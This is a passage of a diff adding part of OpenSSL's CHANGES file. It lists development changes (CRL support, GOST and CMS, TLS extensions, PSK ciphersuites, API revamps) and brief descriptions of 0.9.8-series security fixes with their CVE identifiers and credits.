+     by type-checking.  Still to come: TXT_DB, bsearch(?),
+     OBJ_bsearch_ex, qsort, CRYPTO_EX_DATA, ASN1_VALUE, ASN1_STRING,
+     CONF_VALUE.
+     [Ben Laurie]
+
+  *) New function OPENSSL_gmtime_adj() to add a specific number of days and
+     seconds to a tm structure directly, instead of going through OS
+     specific date routines. This avoids any issues with OS routines such
+     as the year 2038 bug. New *_adj() functions for ASN1 time structures
+     and X509_time_adj_ex() to cover the extended range. The existing
+     X509_time_adj() is still usable and will no longer have any date issues.
+     [Steve Henson]
+
+  *) Delta CRL support. New use deltas option which will attempt to locate
+     and search any appropriate delta CRLs available.
+
+     This work was sponsored by Google.
+     [Steve Henson]
+
+  *) Support for CRLs partitioned by reason code. Reorganise CRL processing
+     code and add additional score elements. Validate alternate CRL paths
+     as part of the CRL checking and indicate a new error "CRL path validation
+     error" in this case. Applications wanting additional details can use
+     the verify callback and check the new "parent" field. If this is not
+     NULL CRL path validation is taking place. Existing applications wont
+     see this because it requires extended CRL support which is off by
+     default.
+
+     This work was sponsored by Google.
+     [Steve Henson]
+
+  *) Support for freshest CRL extension.
+
+     This work was sponsored by Google.
+     [Steve Henson]
+
+  *) Initial indirect CRL support. Currently only supported in the CRLs
+     passed directly and not via lookup. Process certificate issuer
+     CRL entry extension and lookup CRL entries by bother issuer name
+     and serial number. Check and process CRL issuer entry in IDP extension.
+
+     This work was sponsored by Google.
+     [Steve Henson]
+
+  *) Add support for distinct certificate and CRL paths. The CRL issuer
+     certificate is validated separately in this case. Only enabled if
+     an extended CRL support flag is set: this flag will enable additional
+     CRL functionality in future.
+
+     This work was sponsored by Google.
+     [Steve Henson]
+
+  *) Add support for policy mappings extension.
+
+     This work was sponsored by Google.
+     [Steve Henson]
+
+  *) Fixes to pathlength constraint, self issued certificate handling,
+     policy processing to align with RFC3280 and PKITS tests.
+
+     This work was sponsored by Google.
+     [Steve Henson]
+
+  *) Support for name constraints certificate extension. DN, email, DNS
+     and URI types are currently supported.
+
+     This work was sponsored by Google.
+     [Steve Henson]
+
+  *) To cater for systems that provide a pointer-based thread ID rather
+     than numeric, deprecate the current numeric thread ID mechanism and
+     replace it with a structure and associated callback type. This
+     mechanism allows a numeric "hash" to be extracted from a thread ID in
+     either case, and on platforms where pointers are larger than 'long',
+     mixing is done to help ensure the numeric 'hash' is usable even if it
+     can't be guaranteed unique. The default mechanism is to use "&errno"
+     as a pointer-based thread ID to distinguish between threads.
+
+     Applications that want to provide their own thread IDs should now use
+     CRYPTO_THREADID_set_callback() to register a callback that will call
+     either CRYPTO_THREADID_set_numeric() or CRYPTO_THREADID_set_pointer().
+
+     Note that ERR_remove_state() is now deprecated, because it is tied
+     to the assumption that thread IDs are numeric.  ERR_remove_state(0)
+     to free the current thread's error state should be replaced by
+     ERR_remove_thread_state(NULL).
+
+     (This new approach replaces the functions CRYPTO_set_idptr_callback(),
+     CRYPTO_get_idptr_callback(), and CRYPTO_thread_idptr() that existed in
+     OpenSSL 0.9.9-dev between June 2006 and August 2008. Also, if an
+     application was previously providing a numeric thread callback that
+     was inappropriate for distinguishing threads, then uniqueness might
+     have been obtained with &errno that happened immediately in the
+     intermediate development versions of OpenSSL; this is no longer the
+     case, the numeric thread callback will now override the automatic use
+     of &errno.)
+     [Geoff Thorpe, with help from Bodo Moeller]
+
+  *) Initial support for different CRL issuing certificates. This covers a
+     simple case where the self issued certificates in the chain exist and
+     the real CRL issuer is higher in the existing chain.
+
+     This work was sponsored by Google.
+     [Steve Henson]
+
+  *) Removed effectively defunct crypto/store from the build.
+     [Ben Laurie]
+
+  *) Revamp of STACK to provide stronger type-checking. Still to come:
+     TXT_DB, bsearch(?), OBJ_bsearch, qsort, CRYPTO_EX_DATA, ASN1_VALUE,
+     ASN1_STRING, CONF_VALUE.
+     [Ben Laurie]
+
+  *) Add a new SSL_MODE_RELEASE_BUFFERS mode flag to release unused buffer
+     RAM on SSL connections.  This option can save about 34k per idle SSL.
+     [Nick Mathewson]
+
+  *) Revamp of LHASH to provide stronger type-checking. Still to come:
+     STACK, TXT_DB, bsearch, qsort.
+     [Ben Laurie]
+
+  *) Initial support for Cryptographic Message Syntax (aka CMS) based
+     on RFC3850, RFC3851 and RFC3852. New cms directory and cms utility,
+     support for data, signedData, compressedData, digestedData and
+     encryptedData, envelopedData types included. Scripts to check against
+     RFC4134 examples draft and interop and consistency checks of many
+     content types and variants.
+     [Steve Henson]
+
+  *) Add options to enc utility to support use of zlib compression BIO.
+     [Steve Henson]
+
+  *) Extend mk1mf to support importing of options and assembly language
+     files from Configure script, currently only included in VC-WIN32.
+     The assembly language rules can now optionally generate the source
+     files from the associated perl scripts.
+     [Steve Henson]
+
+  *) Implement remaining functionality needed to support GOST ciphersuites.
+     Interop testing has been performed using CryptoPro implementations.
+     [Victor B. Wagner <vitus@cryptocom.ru>]
+
+  *) s390x assembler pack.
+     [Andy Polyakov]
+
+  *) ARMv4 assembler pack. ARMv4 refers to v4 and later ISA, not CPU
+     "family."
+     [Andy Polyakov]
+
+  *) Implement Opaque PRF Input TLS extension as specified in
+     draft-rescorla-tls-opaque-prf-input-00.txt.  Since this is not an
+     official specification yet and no extension type assignment by
+     IANA exists, this extension (for now) will have to be explicitly
+     enabled when building OpenSSL by providing the extension number
+     to use.  For example, specify an option
+
+         -DTLSEXT_TYPE_opaque_prf_input=0x9527
+
+     to the "config" or "Configure" script to enable the extension,
+     assuming extension number 0x9527 (which is a completely arbitrary
+     and unofficial assignment based on the MD5 hash of the Internet
+     Draft).  Note that by doing so, you potentially lose
+     interoperability with other TLS implementations since these might
+     be using the same extension number for other purposes.
+
+     SSL_set_tlsext_opaque_prf_input(ssl, src, len) is used to set the
+     opaque PRF input value to use in the handshake.  This will create
+     an interal copy of the length-'len' string at 'src', and will
+     return non-zero for success.
+
+     To get more control and flexibility, provide a callback function
+     by using
+
+          SSL_CTX_set_tlsext_opaque_prf_input_callback(ctx, cb)
+          SSL_CTX_set_tlsext_opaque_prf_input_callback_arg(ctx, arg)
+
+     where
+
+          int (*cb)(SSL *, void *peerinput, size_t len, void *arg);
+          void *arg;
+
+     Callback function 'cb' will be called in handshakes, and is
+     expected to use SSL_set_tlsext_opaque_prf_input() as appropriate.
+     Argument 'arg' is for application purposes (the value as given to
+     SSL_CTX_set_tlsext_opaque_prf_input_callback_arg() will directly
+     be provided to the callback function).  The callback function
+     has to return non-zero to report success: usually 1 to use opaque
+     PRF input just if possible, or 2 to enforce use of the opaque PRF
+     input.  In the latter case, the library will abort the handshake
+     if opaque PRF input is not successfully negotiated.
+
+     Arguments 'peerinput' and 'len' given to the callback function
+     will always be NULL and 0 in the case of a client.  A server will
+     see the client's opaque PRF input through these variables if
+     available (NULL and 0 otherwise).  Note that if the server
+     provides an opaque PRF input, the length must be the same as the
+     length of the client's opaque PRF input.
+
+     Note that the callback function will only be called when creating
+     a new session (session resumption can resume whatever was
+     previously negotiated), and will not be called in SSL 2.0
+     handshakes; thus, SSL_CTX_set_options(ctx, SSL_OP_NO_SSLv2) or
+     SSL_set_options(ssl, SSL_OP_NO_SSLv2) is especially recommended
+     for applications that need to enforce opaque PRF input.
+
+     [Bodo Moeller]
+
+  *) Update ssl code to support digests other than SHA1+MD5 for handshake
+     MAC. 
+
+     [Victor B. Wagner <vitus@cryptocom.ru>]
+
+  *) Add RFC4507 support to OpenSSL. This includes the corrections in
+     RFC4507bis. The encrypted ticket format is an encrypted encoded
+     SSL_SESSION structure, that way new session features are automatically
+     supported.
+
+     If a client application caches session in an SSL_SESSION structure
+     support is transparent because tickets are now stored in the encoded
+     SSL_SESSION.
+     
+     The SSL_CTX structure automatically generates keys for ticket
+     protection in servers so again support should be possible
+     with no application modification.
+
+     If a client or server wishes to disable RFC4507 support then the option
+     SSL_OP_NO_TICKET can be set.
+
+     Add a TLS extension debugging callback to allow the contents of any client
+     or server extensions to be examined.
+
+     This work was sponsored by Google.
+     [Steve Henson]
+
+  *) Final changes to avoid use of pointer pointer casts in OpenSSL.
+     OpenSSL should now compile cleanly on gcc 4.2
+     [Peter Hartley <pdh@utter.chaos.org.uk>, Steve Henson]
+
+  *) Update SSL library to use new EVP_PKEY MAC API. Include generic MAC
+     support including streaming MAC support: this is required for GOST
+     ciphersuite support.
+     [Victor B. Wagner <vitus@cryptocom.ru>, Steve Henson]
+
+  *) Add option -stream to use PKCS#7 streaming in smime utility. New
+     function i2d_PKCS7_bio_stream() and PEM_write_PKCS7_bio_stream()
+     to output in BER and PEM format.
+     [Steve Henson]
+
+  *) Experimental support for use of HMAC via EVP_PKEY interface. This
+     allows HMAC to be handled via the EVP_DigestSign*() interface. The
+     EVP_PKEY "key" in this case is the HMAC key, potentially allowing
+     ENGINE support for HMAC keys which are unextractable. New -mac and
+     -macopt options to dgst utility.
+     [Steve Henson]
+
+  *) New option -sigopt to dgst utility. Update dgst to use
+     EVP_Digest{Sign,Verify}*. These two changes make it possible to use
+     alternative signing paramaters such as X9.31 or PSS in the dgst 
+     utility.
+     [Steve Henson]
+
+  *) Change ssl_cipher_apply_rule(), the internal function that does
+     the work each time a ciphersuite string requests enabling
+     ("foo+bar"), moving ("+foo+bar"), disabling ("-foo+bar", or
+     removing ("!foo+bar") a class of ciphersuites: Now it maintains
+     the order of disabled ciphersuites such that those ciphersuites
+     that most recently went from enabled to disabled not only stay
+     in order with respect to each other, but also have higher priority
+     than other disabled ciphersuites the next time ciphersuites are
+     enabled again.
+
+     This means that you can now say, e.g., "PSK:-PSK:HIGH" to enable
+     the same ciphersuites as with "HIGH" alone, but in a specific
+     order where the PSK ciphersuites come first (since they are the
+     most recently disabled ciphersuites when "HIGH" is parsed).
+
+     Also, change ssl_create_cipher_list() (using this new
+     funcionality) such that between otherwise identical
+     cihpersuites, ephemeral ECDH is preferred over ephemeral DH in
+     the default order.
+     [Bodo Moeller]
+
+  *) Change ssl_create_cipher_list() so that it automatically
+     arranges the ciphersuites in reasonable order before starting
+     to process the rule string.  Thus, the definition for "DEFAULT"
+     (SSL_DEFAULT_CIPHER_LIST) now is just "ALL:!aNULL:!eNULL", but
+     remains equivalent to "AES:ALL:!aNULL:!eNULL:+aECDH:+kRSA:+RC4:@STRENGTH".
+     This makes it much easier to arrive at a reasonable default order
+     in applications for which anonymous ciphers are OK (meaning
+     that you can't actually use DEFAULT).
+     [Bodo Moeller; suggested by Victor Duchovni]
+
+  *) Split the SSL/TLS algorithm mask (as used for ciphersuite string
+     processing) into multiple integers instead of setting
+     "SSL_MKEY_MASK" bits, "SSL_AUTH_MASK" bits, "SSL_ENC_MASK",
+     "SSL_MAC_MASK", and "SSL_SSL_MASK" bits all in a single integer.
+     (These masks as well as the individual bit definitions are hidden
+     away into the non-exported interface ssl/ssl_locl.h, so this
+     change to the definition of the SSL_CIPHER structure shouldn't
+     affect applications.)  This give us more bits for each of these
+     categories, so there is no longer a need to coagulate AES128 and
+     AES256 into a single algorithm bit, and to coagulate Camellia128
+     and Camellia256 into a single algorithm bit, which has led to all
+     kinds of kludges.
+
+     Thus, among other things, the kludge introduced in 0.9.7m and
+     0.9.8e for masking out AES256 independently of AES128 or masking
+     out Camellia256 independently of AES256 is not needed here in 0.9.9.
+
+     With the change, we also introduce new ciphersuite aliases that
+     so far were missing: "AES128", "AES256", "CAMELLIA128", and
+     "CAMELLIA256".
+     [Bodo Moeller]
+
+  *) Add support for dsa-with-SHA224 and dsa-with-SHA256.
+     Use the leftmost N bytes of the signature input if the input is
+     larger than the prime q (with N being the size in bytes of q).
+     [Nils Larsch]
+
+  *) Very *very* experimental PKCS#7 streaming encoder support. Nothing uses
+     it yet and it is largely untested.
+     [Steve Henson]
+
+  *) Add support for the ecdsa-with-SHA224/256/384/512 signature types.
+     [Nils Larsch]
+
+  *) Initial incomplete changes to avoid need for function casts in OpenSSL
+     some compilers (gcc 4.2 and later) reject their use. Safestack is
+     reimplemented.  Update ASN1 to avoid use of legacy functions. 
+     [Steve Henson]
+
+  *) Win32/64 targets are linked with Winsock2.
+     [Andy Polyakov]
+
+  *) Add an X509_CRL_METHOD structure to allow CRL processing to be redirected
+     to external functions. This can be used to increase CRL handling 
+     efficiency especially when CRLs are very large by (for example) storing
+     the CRL revoked certificates in a database.
+     [Steve Henson]
+
+  *) Overhaul of by_dir code. Add support for dynamic loading of CRLs so
+     new CRLs added to a directory can be used. New command line option
+     -verify_return_error to s_client and s_server. This causes real errors
+     to be returned by the verify callback instead of carrying on no matter
+     what. This reflects the way a "real world" verify callback would behave.
+     [Steve Henson]
+
+  *) GOST engine, supporting several GOST algorithms and public key formats.
+     Kindly donated by Cryptocom.
+     [Cryptocom]
+
+  *) Partial support for Issuing Distribution Point CRL extension. CRLs
+     partitioned by DP are handled but no indirect CRL or reason partitioning
+     (yet). Complete overhaul of CRL handling: now the most suitable CRL is
+     selected via a scoring technique which handles IDP and AKID in CRLs.
+     [Steve Henson]
+
+  *) New X509_STORE_CTX callbacks lookup_crls() and lookup_certs() which
+     will ultimately be used for all verify operations: this will remove the
+     X509_STORE dependency on certificate verification and allow alternative
+     lookup methods.  X509_STORE based implementations of these two callbacks.
+     [Steve Henson]
+
+  *) Allow multiple CRLs to exist in an X509_STORE with matching issuer names.
+     Modify get_crl() to find a valid (unexpired) CRL if possible.
+     [Steve Henson]
+
+  *) New function X509_CRL_match() to check if two CRLs are identical. Normally
+     this would be called X509_CRL_cmp() but that name is already used by
+     a function that just compares CRL issuer names. Cache several CRL 
+     extensions in X509_CRL structure and cache CRLDP in X509.
+     [Steve Henson]
+
+  *) Store a "canonical" representation of X509_NAME structure (ASN1 Name)
+     this maps equivalent X509_NAME structures into a consistent structure.
+     Name comparison can then be performed rapidly using memcmp().
+     [Steve Henson]
+
+  *) Non-blocking OCSP request processing. Add -timeout option to ocsp 
+     utility.
+     [Steve Henson]
+
+  *) Allow digests to supply their own micalg string for S/MIME type using
+     the ctrl EVP_MD_CTRL_MICALG.
+     [Steve Henson]
+
+  *) During PKCS7 signing pass the PKCS7 SignerInfo structure to the
+     EVP_PKEY_METHOD before and after signing via the EVP_PKEY_CTRL_PKCS7_SIGN
+     ctrl. It can then customise the structure before and/or after signing
+     if necessary.
+     [Steve Henson]
+
+  *) New function OBJ_add_sigid() to allow application defined signature OIDs
+     to be added to OpenSSLs internal tables. New function OBJ_sigid_free()
+     to free up any added signature OIDs.
+     [Steve Henson]
+
+  *) New functions EVP_CIPHER_do_all(), EVP_CIPHER_do_all_sorted(),
+     EVP_MD_do_all() and EVP_MD_do_all_sorted() to enumerate internal
+     digest and cipher tables. New options added to openssl utility:
+     list-message-digest-algorithms and list-cipher-algorithms.
+     [Steve Henson]
+
+  *) Change the array representation of binary polynomials: the list
+     of degrees of non-zero coefficients is now terminated with -1.
+     Previously it was terminated with 0, which was also part of the
+     value; thus, the array representation was not applicable to
+     polynomials where t^0 has coefficient zero.  This change makes
+     the array representation useful in a more general context.
+     [Douglas Stebila]
+
+  *) Various modifications and fixes to SSL/TLS cipher string
+     handling.  For ECC, the code now distinguishes between fixed ECDH
+     with RSA certificates on the one hand and with ECDSA certificates
+     on the other hand, since these are separate ciphersuites.  The
+     unused code for Fortezza ciphersuites has been removed.
+
+     For consistency with EDH, ephemeral ECDH is now called "EECDH"
+     (not "ECDHE").  For consistency with the code for DH
+     certificates, use of ECDH certificates is now considered ECDH
+     authentication, not RSA or ECDSA authentication (the latter is
+     merely the CA's signing algorithm and not actively used in the
+     protocol).
+
+     The temporary ciphersuite alias "ECCdraft" is no longer
+     available, and ECC ciphersuites are no longer excluded from "ALL"
+     and "DEFAULT".  The following aliases now exist for RFC 4492
+     ciphersuites, most of these by analogy with the DH case:
+
+         kECDHr   - ECDH cert, signed with RSA
+         kECDHe   - ECDH cert, signed with ECDSA
+         kECDH    - ECDH cert (signed with either RSA or ECDSA)
+         kEECDH   - ephemeral ECDH
+         ECDH     - ECDH cert or ephemeral ECDH
+
+         aECDH    - ECDH cert
+         aECDSA   - ECDSA cert
+         ECDSA    - ECDSA cert
+
+         AECDH    - anonymous ECDH
+         EECDH    - non-anonymous ephemeral ECDH (equivalent to "kEECDH:-AECDH")
+
+     [Bodo Moeller]
+
+  *) Add additional S/MIME capabilities for AES and GOST ciphers if supported.
+     Use correct micalg parameters depending on digest(s) in signed message.
+     [Steve Henson]
+
+  *) Add engine support for EVP_PKEY_ASN1_METHOD. Add functions to process
+     an ENGINE asn1 method. Support ENGINE lookups in the ASN1 code.
+     [Steve Henson]
+
+  *) Initial engine support for EVP_PKEY_METHOD. New functions to permit
+     an engine to register a method. Add ENGINE lookups for methods and
+     functional reference processing.
+     [Steve Henson]
+
+  *) New functions EVP_Digest{Sign,Verify)*. These are enchance versions of
+     EVP_{Sign,Verify}* which allow an application to customise the signature
+     process.
+     [Steve Henson]
+
+  *) New -resign option to smime utility. This adds one or more signers
+     to an existing PKCS#7 signedData structure. Also -md option to use an
+     alternative message digest algorithm for signing.
+     [Steve Henson]
+
+  *) Tidy up PKCS#7 routines and add new functions to make it easier to
+     create PKCS7 structures containing multiple signers. Update smime
+     application to support multiple signers.
+     [Steve Henson]
+
+  *) New -macalg option to pkcs12 utility to allow setting of an alternative
+     digest MAC.
+     [Steve Henson]
+
+  *) Initial support for PKCS#5 v2.0 PRFs other than default SHA1 HMAC.
+     Reorganize PBE internals to lookup from a static table using NIDs,
+     add support for HMAC PBE OID translation. Add a EVP_CIPHER ctrl:
+     EVP_CTRL_PBE_PRF_NID this allows a cipher to specify an alternative
+     PRF which will be automatically used with PBES2.
+     [Steve Henson]
+
+  *) Replace the algorithm specific calls to generate keys in "req" with the
+     new API.
+     [Steve Henson]
+
+  *) Update PKCS#7 enveloped data routines to use new API. This is now
+     supported by any public key method supporting the encrypt operation. A
+     ctrl is added to allow the public key algorithm to examine or modify
+     the PKCS#7 RecipientInfo structure if it needs to: for RSA this is
+     a no op.
+     [Steve Henson]
+
+  *) Add a ctrl to asn1 method to allow a public key algorithm to express
+     a default digest type to use. In most cases this will be SHA1 but some
+     algorithms (such as GOST) need to specify an alternative digest. The
+     return value indicates how strong the prefernce is 1 means optional and
+     2 is mandatory (that is it is the only supported type). Modify
+     ASN1_item_sign() to accept a NULL digest argument to indicate it should
+     use the default md. Update openssl utilities to use the default digest
+     type for signing if it is not explicitly indicated.
+     [Steve Henson]
+
+  *) Use OID cross reference table in ASN1_sign() and ASN1_verify(). New 
+     EVP_MD flag EVP_MD_FLAG_PKEY_METHOD_SIGNATURE. This uses the relevant
+     signing method from the key type. This effectively removes the link
+     between digests and public key types.
+     [Steve Henson]
+
+  *) Add an OID cross reference table and utility functions. Its purpose is to
+     translate between signature OIDs such as SHA1WithrsaEncryption and SHA1,
+     rsaEncryption. This will allow some of the algorithm specific hackery
+     needed to use the correct OID to be removed. 
+     [Steve Henson]
+
+  *) Remove algorithm specific dependencies when setting PKCS7_SIGNER_INFO
+     structures for PKCS7_sign(). They are now set up by the relevant public
+     key ASN1 method.
+     [Steve Henson]
+
+  *) Add provisional EC pkey method with support for ECDSA and ECDH.
+     [Steve Henson]
+
+  *) Add support for key derivation (agreement) in the API, DH method and
+     pkeyutl.
+     [Steve Henson]
+
+  *) Add DSA pkey method and DH pkey methods, extend DH ASN1 method to support
+     public and private key formats. As a side effect these add additional 
+     command line functionality not previously available: DSA signatures can be
+     generated and verified using pkeyutl and DH key support and generation in
+     pkey, genpkey.
+     [Steve Henson]
+
+  *) BeOS support.
+     [Oliver Tappe <zooey@hirschkaefer.de>]
+
+  *) New make target "install_html_docs" installs HTML renditions of the
+     manual pages.
+     [Oliver Tappe <zooey@hirschkaefer.de>]
+
+  *) New utility "genpkey" this is analagous to "genrsa" etc except it can
+     generate keys for any algorithm. Extend and update EVP_PKEY_METHOD to
+     support key and parameter generation and add initial key generation
+     functionality for RSA.
+     [Steve Henson]
+
+  *) Add functions for main EVP_PKEY_method operations. The undocumented
+     functions EVP_PKEY_{encrypt,decrypt} have been renamed to
+     EVP_PKEY_{encrypt,decrypt}_old. 
+     [Steve Henson]
+
+  *) Initial definitions for EVP_PKEY_METHOD. This will be a high level public
+     key API, doesn't do much yet.
+     [Steve Henson]
+
+  *) New function EVP_PKEY_asn1_get0_info() to retrieve information about
+     public key algorithms. New option to openssl utility:
+     "list-public-key-algorithms" to print out info.
+     [Steve Henson]
+
+  *) Implement the Supported Elliptic Curves Extension for
+     ECC ciphersuites from draft-ietf-tls-ecc-12.txt.
+     [Douglas Stebila]
+
+  *) Don't free up OIDs in OBJ_cleanup() if they are in use by EVP_MD or
+     EVP_CIPHER structures to avoid later problems in EVP_cleanup().
+     [Steve Henson]
+
+  *) New utilities pkey and pkeyparam. These are similar to algorithm specific
+     utilities such as rsa, dsa, dsaparam etc except they process any key
+     type.
+     [Steve Henson]
+
+  *) Transfer public key printing routines to EVP_PKEY_ASN1_METHOD. New 
+     functions EVP_PKEY_print_public(), EVP_PKEY_print_private(),
+     EVP_PKEY_print_param() to print public key data from an EVP_PKEY
+     structure.
+     [Steve Henson]
+
+  *) Initial support for pluggable public key ASN1.
+     De-spaghettify the public key ASN1 handling. Move public and private
+     key ASN1 handling to a new EVP_PKEY_ASN1_METHOD structure. Relocate
+     algorithm specific handling to a single module within the relevant
+     algorithm directory. Add functions to allow (near) opaque processing
+     of public and private key structures.
+     [Steve Henson]
+
+  *) Implement the Supported Point Formats Extension for
+     ECC ciphersuites from draft-ietf-tls-ecc-12.txt.
+     [Douglas Stebila]
+
+  *) Add initial support for RFC 4279 PSK TLS ciphersuites. Add members
+     for the psk identity [hint] and the psk callback functions to the
+     SSL_SESSION, SSL and SSL_CTX structure.
+     
+     New ciphersuites:
+         PSK-RC4-SHA, PSK-3DES-EDE-CBC-SHA, PSK-AES128-CBC-SHA,
+         PSK-AES256-CBC-SHA
+ 
+     New functions:
+         SSL_CTX_use_psk_identity_hint
+         SSL_get_psk_identity_hint
+         SSL_get_psk_identity
+         SSL_use_psk_identity_hint
+
+     [Mika Kousa and Pasi Eronen of Nokia Corporation]
+
+  *) Add RFC 3161 compliant time stamp request creation, response generation
+     and response verification functionality.
+     [Zoltán Glózik <zglozik@opentsa.org>, The OpenTSA Project]
+
+  *) Add initial support for TLS extensions, specifically for the server_name
+     extension so far.  The SSL_SESSION, SSL_CTX, and SSL data structures now
+     have new members for a host name.  The SSL data structure has an
+     additional member SSL_CTX *initial_ctx so that new sessions can be
+     stored in that context to allow for session resumption, even after the
+     SSL has been switched to a new SSL_CTX in reaction to a client's
+     server_name extension.
+
+     New functions (subject to change):
+
+         SSL_get_servername()
+         SSL_get_servername_type()
+         SSL_set_SSL_CTX()
+
+     New CTRL codes and macros (subject to change):
+
+         SSL_CTRL_SET_TLSEXT_SERVERNAME_CB
+                                 - SSL_CTX_set_tlsext_servername_callback()
+         SSL_CTRL_SET_TLSEXT_SERVERNAME_ARG
+                                      - SSL_CTX_set_tlsext_servername_arg()
+         SSL_CTRL_SET_TLSEXT_HOSTNAME           - SSL_set_tlsext_host_name()
+
+     openssl s_client has a new '-servername ...' option.
+
+     openssl s_server has new options '-servername_host ...', '-cert2 ...',
+     '-key2 ...', '-servername_fatal' (subject to change).  This allows
+     testing the HostName extension for a specific single host name ('-cert'
+     and '-key' remain fallbacks for handshakes without HostName
+     negotiation).  If the unrecogninzed_name alert has to be sent, this by
+     default is a warning; it becomes fatal with the '-servername_fatal'
+     option.
+
+     [Peter Sylvester,  Remy Allais, Christophe Renou]
+
+  *) Whirlpool hash implementation is added.
+     [Andy Polyakov]
+
+  *) BIGNUM code on 64-bit SPARCv9 targets is switched from bn(64,64) to
+     bn(64,32). Because of instruction set limitations it doesn't have
+     any negative impact on performance. This was done mostly in order
+     to make it possible to share assembler modules, such as bn_mul_mont
+     implementations, between 32- and 64-bit builds without hassle.
+     [Andy Polyakov]
+
+  *) Move code previously exiled into file crypto/ec/ec2_smpt.c
+     to ec2_smpl.c, and no longer require the OPENSSL_EC_BIN_PT_COMP
+     macro.
+     [Bodo Moeller]
+
+  *) New candidate for BIGNUM assembler implementation, bn_mul_mont,
+     dedicated Montgomery multiplication procedure, is introduced.
+     BN_MONT_CTX is modified to allow bn_mul_mont to reach for higher
+     "64-bit" performance on certain 32-bit targets.
+     [Andy Polyakov]
+
+  *) New option SSL_OP_NO_COMP to disable use of compression selectively
+     in SSL structures. New SSL ctrl to set maximum send fragment size. 
+     Save memory by seeting the I/O buffer sizes dynamically instead of
+     using the maximum available value.
+     [Steve Henson]
+
+  *) New option -V for 'openssl ciphers'. This prints the ciphersuite code
+     in addition to the text details.
+     [Bodo Moeller]
+
+  *) Very, very preliminary EXPERIMENTAL support for printing of general
+     ASN1 structures. This currently produces rather ugly output and doesn't
+     handle several customised structures at all.
+     [Steve Henson]
+
+  *) Integrated support for PVK file format and some related formats such
+     as MS PUBLICKEYBLOB and PRIVATEKEYBLOB. Command line switches to support
+     these in the 'rsa' and 'dsa' utilities.
+     [Steve Henson]
+
+  *) Support for PKCS#1 RSAPublicKey format on rsa utility command line.
+     [Steve Henson]
+
+  *) Remove the ancient ASN1_METHOD code. This was only ever used in one
+     place for the (very old) "NETSCAPE" format certificates which are now
+     handled using new ASN1 code equivalents.
+     [Steve Henson]
+
+  *) Let the TLSv1_method() etc. functions return a 'const' SSL_METHOD
+     pointer and make the SSL_METHOD parameter in SSL_CTX_new,
+     SSL_CTX_set_ssl_version and SSL_set_ssl_method 'const'.
+     [Nils Larsch]
+
+  *) Modify CRL distribution points extension code to print out previously
+     unsupported fields. Enhance extension setting code to allow setting of
+     all fields.
+     [Steve Henson]
+
+  *) Add print and set support for Issuing Distribution Point CRL extension.
+     [Steve Henson]
+
+  *) Change 'Configure' script to enable Camellia by default.
+     [NTT]
+
+ Changes between 0.9.8x and 0.9.8y [5 Feb 2013]
+
+  *) Make the decoding of SSLv3, TLS and DTLS CBC records constant time.
+
+     This addresses the flaw in CBC record processing discovered by 
+     Nadhem Alfardan and Kenny Paterson. Details of this attack can be found
+     at: http://www.isg.rhul.ac.uk/tls/     
+
+     Thanks go to Nadhem Alfardan and Kenny Paterson of the Information
+     Security Group at Royal Holloway, University of London
+     (www.isg.rhul.ac.uk) for discovering this flaw and Adam Langley and
+     Emilia Käsper for the initial patch.
+     (CVE-2013-0169)
+     [Emilia Käsper, Adam Langley, Ben Laurie, Andy Polyakov, Steve Henson]
+
+  *) Return an error when checking OCSP signatures when key is NULL.
+     This fixes a DoS attack. (CVE-2013-0166)
+     [Steve Henson]
+
+  *) Call OCSP Stapling callback after ciphersuite has been chosen, so
+     the right response is stapled. Also change SSL_get_certificate()
+     so it returns the certificate actually sent.
+     See http://rt.openssl.org/Ticket/Display.html?id=2836.
+     (This is a backport)
+     [Rob Stradling <rob.stradling@comodo.com>]
+
+  *) Fix possible deadlock when decoding public keys.
+     [Steve Henson]
+
+ Changes between 0.9.8w and 0.9.8x [10 May 2012]
+
+  *) Sanity check record length before skipping explicit IV in DTLS
+     to fix DoS attack.
+
+     Thanks to Codenomicon for discovering this issue using Fuzz-o-Matic
+     fuzzing as a service testing platform.
+     (CVE-2012-2333)
+     [Steve Henson]
+
+  *) Initialise tkeylen properly when encrypting CMS messages.
+     Thanks to Solar Designer of Openwall for reporting this issue.
+     [Steve Henson]
+
+ Changes between 0.9.8v and 0.9.8w [23 Apr 2012]
+
+  *) The fix for CVE-2012-2110 did not take into account that the 
+     'len' argument to BUF_MEM_grow and BUF_MEM_grow_clean is an
+     int in OpenSSL 0.9.8, making it still vulnerable. Fix by 
+     rejecting negative len parameter. (CVE-2012-2131)
+     [Tomas Hoger <thoger@redhat.com>]
+
+ Changes between 0.9.8u and 0.9.8v [19 Apr 2012]
+
+  *) Check for potentially exploitable overflows in asn1_d2i_read_bio
+     BUF_mem_grow and BUF_mem_grow_clean. Refuse attempts to shrink buffer
+     in CRYPTO_realloc_clean.
+
+     Thanks to Tavis Ormandy, Google Security Team, for discovering this
+     issue and to Adam Langley <agl@chromium.org> for fixing it.
+     (CVE-2012-2110)
+     [Adam Langley (Google), Tavis Ormandy, Google Security Team]
+
+ Changes between 0.9.8t and 0.9.8u [12 Mar 2012]
+
+  *) Fix MMA (Bleichenbacher's attack on PKCS #1 v1.5 RSA padding) weakness
+     in CMS and PKCS7 code. When RSA decryption fails use a random key for
+     content decryption and always return the same error. Note: this attack
+     needs on average 2^20 messages so it only affects automated senders. The
+     old behaviour can be reenabled in the CMS code by setting the
+     CMS_DEBUG_DECRYPT flag: this is useful for debugging and testing where
+     an MMA defence is not necessary.
+     Thanks to Ivan Nestlerode <inestlerode@us.ibm.com> for discovering
+     this issue. (CVE-2012-0884)
+     [Steve Henson]
+
+  *) Fix CVE-2011-4619: make sure we really are receiving a 
+     client hello before rejecting multiple SGC restarts. Thanks to
+     Ivan Nestlerode <inestlerode@us.ibm.com> for discovering this bug.
+     [Steve Henson]
+
+ Changes between 0.9.8s and 0.9.8t [18 Jan 2012]
+
+  *) Fix for DTLS DoS issue introduced by fix for CVE-2011-4109.
+     Thanks to Antonio Martin, Enterprise Secure Access Research and
+     Development, Cisco Systems, Inc. for discovering this bug and
+     preparing a fix. (CVE-2012-0050)
+     [Antonio Martin]
+
+ Changes between 0.9.8r and 0.9.8s [4 Jan 2012]
+
+  *) Nadhem Alfardan and Kenny Paterson have discovered an extension
+     of the Vaudenay padding oracle attack on CBC mode encryption
+     which enables an efficient plaintext recovery attack against
+     the OpenSSL implementation of DTLS. Their attack exploits timing
+     differences arising during decryption processing. A research
+     paper describing this attack can be found at:
+                  http://www.isg.rhul.ac.uk/~kp/dtls.pdf
+     Thanks go to Nadhem Alfardan and Kenny Paterson of the Information
+     Security Group at Royal Holloway, University of London
+     (www.isg.rhul.ac.uk) for discovering this flaw and to Robin Seggelmann
